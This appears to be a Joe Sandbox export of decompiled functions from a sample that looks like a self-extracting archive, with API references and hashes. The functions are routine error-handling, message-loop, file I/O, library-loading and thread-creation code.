Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: f3ee0a865f32c5277cfe0cf02dc8cc2241707c07d3ec0edd4bbc6e8101793ac4
Instruction ID: 3b5b73e39bd4070b074ea996eff53fdd7db151a3f79df34d9a5091cd8f900a2d
Opcode Fuzzy Hash: f3ee0a865f32c5277cfe0cf02dc8cc2241707c07d3ec0edd4bbc6e8101793ac4
Instruction Fuzzy Hash: 8C312430544745AFE7309F24CD86BEABBD8FB05320F200B5DF9A5961D0D7B8A954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B89869 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00B89869(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t17;
				long _t18;

				_t11 = __ecx;
				_t18 = GetLastError();
				_t10 = 0;
				_t2 =  *0xb9e7fc; // 0x6
				_t21 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00B8B136(_t11, 1, 0x364); // executed
					_t17 = _t3;
					_pop(_t13);
					if(_t17 != 0) {
						_t4 = E00B8AEB1(_t10, _t13, _t17, __eflags,  *0xb9e7fc, _t17);
						__eflags = _t4;
						if(_t4 != 0) {
							E00B89649(_t13, _t17, 0xbc2288);
							E00B88DCC(_t10);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t17);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00B88DCC();
						L8:
						SetLastError(_t18);
					}
				} else {
					_t17 = E00B8AE5B(0, _t11, _t16, _t21, _t2);
					if(_t17 != 0) {
						L9:
						SetLastError(_t18);
						_t10 = _t17;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00b89869
0x00b89874
0x00b89876
0x00b89878
0x00b8987d
0x00b89880
0x00b8988e
0x00b89895
0x00b8989a
0x00b8989d
0x00b898a0
0x00b898b2
0x00b898b7
0x00b898b9
0x00b898c4
0x00b898ca
0x00b898d2
0x00b898d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00b898bb
0x00b898bb
0x00000000
0x00b898bb
0x00b898a2
0x00b898a2
0x00b898a3
0x00b898a3
0x00b898d6
0x00b898d7
0x00b898d7
0x00b89882
0x00b89888
0x00b8988c
0x00b898df
0x00b898e0
0x00b898e6
0x00000000
0x00000000
0x00000000
0x00b8988c
0x00b898ed

APIs

GetLastError.KERNEL32(?,?,?,00B891AD,00B8B188,?,00B89813,00000001,00000364,?,00B840EF,?,?,00BA1098), ref: 00B8986E
_free.LIBCMT ref: 00B898A3
_free.LIBCMT ref: 00B898CA
SetLastError.KERNEL32(00000000,?,00BA1098), ref: 00B898D7
SetLastError.KERNEL32(00000000,?,00BA1098), ref: 00B898E0

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7e9ec31dac36ab1303914921f4de8b746895b8534b3e176559ad03965eb50b2b
Instruction ID: b95a52b9603218b5bc0f96d75d63794c1e227d4358227e3ec5505d2c17e2f3dc
Opcode Fuzzy Hash: 7e9ec31dac36ab1303914921f4de8b746895b8534b3e176559ad03965eb50b2b
Instruction Fuzzy Hash: BB01F4361446026BDB1277746D85E3B25EADBD3BB173801BAF515A72B2EE24CC02D322

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B7B568() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xba8458; // 0x1042a
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x00b7b579
0x00b7b581
0x00b7b58a
0x00b7b590
0x00b7b597
0x00b7b5a8
0x00b7b5ac
0x00b7b5b6
0x00000000
0x00b7b5b6
0x00b7b59e
0x00b7b5a6
0x00000000
0x00000000
0x00b7b5a6
0x00b7b5be

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7B58A
IsDialogMessageW.USER32(0001042A,?), ref: 00B7B59E
TranslateMessage.USER32(?), ref: 00B7B5AC
DispatchMessageW.USER32(?), ref: 00B7B5B6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: e800fc82ef9a81ecb96270f69d8de5f9e04754305dec590ea37c387abb444ba6
Instruction ID: 641184c309749d60df67420d83125c0e488ddd1aed6aa6694805200edb0cbe0a
Opcode Fuzzy Hash: e800fc82ef9a81ecb96270f69d8de5f9e04754305dec590ea37c387abb444ba6
Instruction Fuzzy Hash: 4EF0D072A0111AAB8B20ABE6DC4CEDB7FFCEE097917408415B519D3010EF34D605CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00B7AC16(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00B7081B(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xbc3174(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xbc3034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00B7EB2C(); // executed
				 *0xbc3090(0xba8438,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x00b7ac25
0x00b7ac2c
0x00b7ac2f
0x00b7ac38
0x00b7ac40
0x00b7ac47
0x00b7ac51
0x00b7ac5c
0x00b7ac60
0x00b7ac63
0x00b7ac66
0x00b7ac70
0x00b7ac7b

APIs

Part of subcall function 00B7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B70836
Part of subcall function 00B7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B6F2D8,Crypt32.dll,00000000,00B6F35C,?,?,00B6F33E,?,?,?), ref: 00B70858

OleInitialize.OLE32(00000000), ref: 00B7AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B7AC66
SHGetMalloc.SHELL32(00BA8438), ref: 00B7AC70

Strings

riched20.dll, xrefs: 00B7AC1E

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 8ac2227845fbe994ca148e67ddab27023a7c6d86c05ef32ab8defa4b0dbc3138
Instruction ID: 4718b47d599d724ef0cd2005adc28065c45a43586d05313528adbdfe4732c2e4
Opcode Fuzzy Hash: 8ac2227845fbe994ca148e67ddab27023a7c6d86c05ef32ab8defa4b0dbc3138
Instruction Fuzzy Hash: 65F0FFB5900209ABCB10AFA9D849DDFFFFCEF89700F40815AA415A2251DBB456058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00B7DBDE(void* __eflags, WCHAR* _a4) {
				char _v8196;
				WCHAR* _t8;
				int _t11;
				WCHAR* _t13;

				E00B7EC50(0x2000);
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t8 = E00B70371(_a4,  &_v8196, 0x1000);
				_t13 = _t8;
				if(_t13 != 0) {
					_push( *_t13 & 0x0000ffff);
					while(E00B7048D() != 0) {
						_t13 =  &(_t13[1]);
						_push( *_t13 & 0x0000ffff);
					}
					_t11 = SetEnvironmentVariableW(L"sfxpar", _t13); // executed
					return _t11;
				}
				return _t8;
			}

0x00b7dbe6
0x00b7dbf4
0x00b7dc09
0x00b7dc0e
0x00b7dc12
0x00b7dc17
0x00b7dc21
0x00b7dc1a
0x00b7dc20
0x00b7dc20
0x00b7dc30
0x00000000
0x00b7dc30
0x00b7dc38

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00B7DBF4
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B7DC30

Strings

sfxcmd, xrefs: 00B7DBEF
sfxpar, xrefs: 00B7DC2B

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 10bfca6dc16ea3c55d202924c8463e7c6f2cb884ef2a7ed0bf702648516bd9b5
Instruction ID: 244ca976b63db48b226b7e44095efd0edd029a9e752ca505b232907c5b00c313
Opcode Fuzzy Hash: 10bfca6dc16ea3c55d202924c8463e7c6f2cb884ef2a7ed0bf702648516bd9b5
Instruction Fuzzy Hash: 44F0ECB2404234A7DF222FA48D06BFA37E8EF04BC5B0444D2BD9DB6161E6B09980D7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00B69785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00B69785(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 1) {
					 *(_t25 + 8) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 8), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00B698BC(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0x10)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0x10)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00B69785(_t25);
						}
					}
				}
				return _t15;
			}

0x00b69788
0x00b6978a
0x00b69791
0x00b6979b
0x00b6979b
0x00b697ad
0x00b697b5
0x00b69811
0x00b697b7
0x00b697b9
0x00b697c0
0x00b697d9
0x00b697dd
0x00b697ee
0x00b697f2
0x00b6980c
0x00b6980c
0x00b697fe
0x00b697fe
0x00b69807
0x00000000
0x00b69809
0x00b69809
0x00000000
0x00b69809
0x00b69807
0x00b697df
0x00b697df
0x00b697e8
0x00000000
0x00b697ea
0x00b697ea
0x00b697ea
0x00b697e8
0x00b697c2
0x00b697c2
0x00b697ca
0x00000000
0x00b697cc
0x00b697cc
0x00b697cd
0x00b697cd
0x00b697d2
0x00b697d2
0x00b697ca
0x00b697c0
0x00b69817

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B69795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B697AD
GetLastError.KERNEL32 ref: 00B697DF
GetLastError.KERNEL32 ref: 00B697FE

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 30f4d00be7debf9333904cf5df76e517fc9233a2bbf5d8015dc7fed873d78733
Instruction ID: 7ed20a75a7f85b9f72f193faff139b18824ad080b75b4f78f28926c7abb7602f
Opcode Fuzzy Hash: 30f4d00be7debf9333904cf5df76e517fc9233a2bbf5d8015dc7fed873d78733
Instruction Fuzzy Hash: 0F11A130910204EBDF205F64C944A7937EDFB527A4F1089AAF426C7190DB7CDE44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00B8AD34(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xbc25d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xb973f0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x37e7c70
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00b8ad39
0x00b8ad3d
0x00b8ad44
0x00b8ad48
0x00b8ad56
0x00b8ad66
0x00b8ad6c
0x00b8ad70
0x00b8ad99
0x00b8ad9b
0x00b8ad9f
0x00b8ada2
0x00b8ada2
0x00b8ada8
0x00b8adaa
0x00000000
0x00b8adab
0x00b8ad72
0x00b8ad7b
0x00b8ad8a
0x00b8ad7d
0x00b8ad80
0x00b8ad86
0x00b8ad86
0x00b8ad8e
0x00000000
0x00b8ad90
0x00b8ad93
0x00b8ad95
0x00000000
0x00b8ad95
0x00b8ad8e
0x00b8ad4a
0x00b8ad4f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B840EF,00000000,00000000,?,00B8ACDB,00B840EF,00000000,00000000,00000000,?,00B8AED8,00000006,FlsSetValue), ref: 00B8AD66
GetLastError.KERNEL32(?,00B8ACDB,00B840EF,00000000,00000000,00000000,?,00B8AED8,00000006,FlsSetValue,00B97970,FlsSetValue,00000000,00000364,?,00B898B7), ref: 00B8AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B8ACDB,00B840EF,00000000,00000000,00000000,?,00B8AED8,00000006,FlsSetValue,00B97970,FlsSetValue,00000000), ref: 00B8AD80

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 92dcd5a9b8bd3f25de70a87ece5a8175056fff1f1889037895ad2e365ac9f8a2
Instruction ID: 9e6b7052fec9f71e7defa5733aaf3e8f8de62a7a697f5e7b0753b373a8468d26
Opcode Fuzzy Hash: 92dcd5a9b8bd3f25de70a87ece5a8175056fff1f1889037895ad2e365ac9f8a2
Instruction Fuzzy Hash: 5C01F236211622ABE721AF68AC84A577BE8EF05BA27250672FD06D3570DF21DC01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00B7101F() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xba1098 > 0) {
					_t18 = 0xba109c;
					do {
						_t7 = CreateThread(0, 0x10000, E00B71160, 0xba1098, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xba1098);
							E00B66C36(0xba1098);
							E00B66C31(E00B66DCB(0xba1098, _t25), 0xba1098, 0xba1098, 2);
						}
						 *_t18 = _t22;
						 *0x00BA119C =  *((intOrPtr*)(0xba119c)) + 1;
						_t8 =  *0xba81e0; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xba1098);
					return _t8;
				}
				return _t5;
			}

0x00b71024
0x00b71028
0x00b7102c
0x00b7102f
0x00b71043
0x00b71049
0x00b7104b
0x00b7104d
0x00b7104f
0x00b71054
0x00b71059
0x00b71071
0x00b71071
0x00b71076
0x00b71078
0x00b7107e
0x00b71085
0x00b7108a
0x00b7108a
0x00b71090
0x00b71091
0x00b71094
0x00000000
0x00b71099
0x00b7109d

APIs

CreateThread.KERNELBASE ref: 00B71043
SetThreadPriority.KERNEL32(?,00000000), ref: 00B7108A

Part of subcall function 00B66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B66C54

Strings

CreateThread failed, xrefs: 00B7104F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 58e7fcf5218ef0faae70d882a88c09e84598737b9f4ce81b3cc684dc1dd1f427
Instruction ID: 6b833489397790bebca1f1495de0ef6a56cf3d88b67a66fbb055057ec33f7651
Opcode Fuzzy Hash: 58e7fcf5218ef0faae70d882a88c09e84598737b9f4ce81b3cc684dc1dd1f427
Instruction Fuzzy Hash: 0D01F9B63483096FD3305F6CAC52F7B73D8EB41751F2008AEF69B66180CEA16C858634

Uniqueness

Uniqueness Score: -1.00%

Function 00B69F7A Relevance: 4.6, APIs: 3, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B69F7A() {
				void* __ecx;
				void* __ebp;
				long _t37;
				void* _t42;
				void* _t46;
				signed int _t49;
				intOrPtr* _t53;
				void** _t54;
				DWORD* _t61;
				void* _t65;
				intOrPtr _t66;
				long _t67;
				intOrPtr* _t69;
				void* _t70;

				_t67 =  *(_t70 + 0x18);
				_t69 = _t53;
				if(_t67 != 0) {
					_t54 = _t69 + 8;
					 *(_t70 + 0xc) = _t54;
					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
						 *(_t70 + 0xc) = _t54;
					} else {
						_t46 = GetStdHandle(0xfffffff5);
						_t54 = _t69 + 8;
						 *_t54 = _t46;
					}
					while(1) {
						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
						_t49 = 0;
						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
							goto L13;
						}
						_t65 = 0;
						if(_t67 == 0) {
							L15:
							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
								L22:
								 *((char*)(_t69 + 0xc)) = 1;
								return _t49;
							} else {
								_t64 = _t69 + 0x32;
								if(E00B66BAA(0xba1098, _t69 + 0x32, 0) == 0) {
									E00B66E98(0xba1098, _t69, 0, _t64);
									goto L22;
								}
								_t54 =  *(_t70 + 0x14);
								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
									_t66 =  *_t69;
									 *0xb93278(0);
									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
									asm("sbb edx, 0x0");
									 *0xb93278(_t42 -  *(_t70 + 0x14), _t61);
									 *((intOrPtr*)(_t66 + 0x10))();
									_t67 =  *(_t70 + 0x20);
									_t54 =  *(_t70 + 0x14);
								}
								continue;
							}
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t37 = _t67 - _t65;
							if(_t37 >= 0x4000) {
								_t37 = 0x4000;
							}
							_t61 = _t70 + 0x14;
							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
							_t49 = _t49 & 0xffffff00 | _t13;
							if(_t13 != 0) {
								break;
							}
							_t54 =  *(_t70 + 0x14);
							_t65 = _t65 + 0x4000;
							if(_t65 < _t67) {
								continue;
							}
							break;
						}
						L14:
						if(_t49 != 0) {
							goto L22;
						}
						goto L15;
						L13:
						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
						asm("sbb bl, bl");
						_t49 = 1;
						goto L14;
					}
				}
				return 1;
			}

0x00b69f7e
0x00b69f82
0x00b69f86
0x00b69f93
0x00b69f96
0x00b69f9a
0x00b69fab
0x00b69f9c
0x00b69f9e
0x00b69fa4
0x00b69fa7
0x00b69fa7
0x00b69fb1
0x00b69fb1
0x00b69fb6
0x00b69fbc
0x00000000
0x00000000
0x00b69fbe
0x00b69fc2
0x00b6a024
0x00b6a028
0x00b6a0a2
0x00b6a0a5
0x00000000
0x00b6a030
0x00b6a032
0x00b6a042
0x00b6a09d
0x00000000
0x00b6a09d
0x00b6a044
0x00b6a04c
0x00b6a05d
0x00b6a067
0x00b6a06f
0x00b6a078
0x00b6a07d
0x00b6a085
0x00b6a088
0x00b6a08c
0x00b6a08c
0x00000000
0x00b6a04c
0x00000000
0x00000000
0x00000000
0x00b69fc4
0x00b69fc4
0x00b69fc6
0x00b69fcd
0x00b69fcf
0x00b69fcf
0x00b69fd6
0x00b69fee
0x00b69fee
0x00b69ff1
0x00000000
0x00000000
0x00b69ff3
0x00b69ff7
0x00b69fff
0x00000000
0x00000000
0x00000000
0x00b6a001
0x00b6a020
0x00b6a022
0x00000000
0x00000000
0x00000000
0x00b6a003
0x00b6a011
0x00b6a01c
0x00b6a01e
0x00000000
0x00b6a01e
0x00b69fb1
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B6D343,00000001,?,?,?,00000000,00B7551D,?,?,?), ref: 00B69F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B7551D,?,?,?,?,?,00B74FC7,?), ref: 00B69FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B6D343,00000001,?,?), ref: 00B6A011

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 69cf8e81a0997e03855f3b3726ba23fa417a739124453e6b773ac365649f8b64
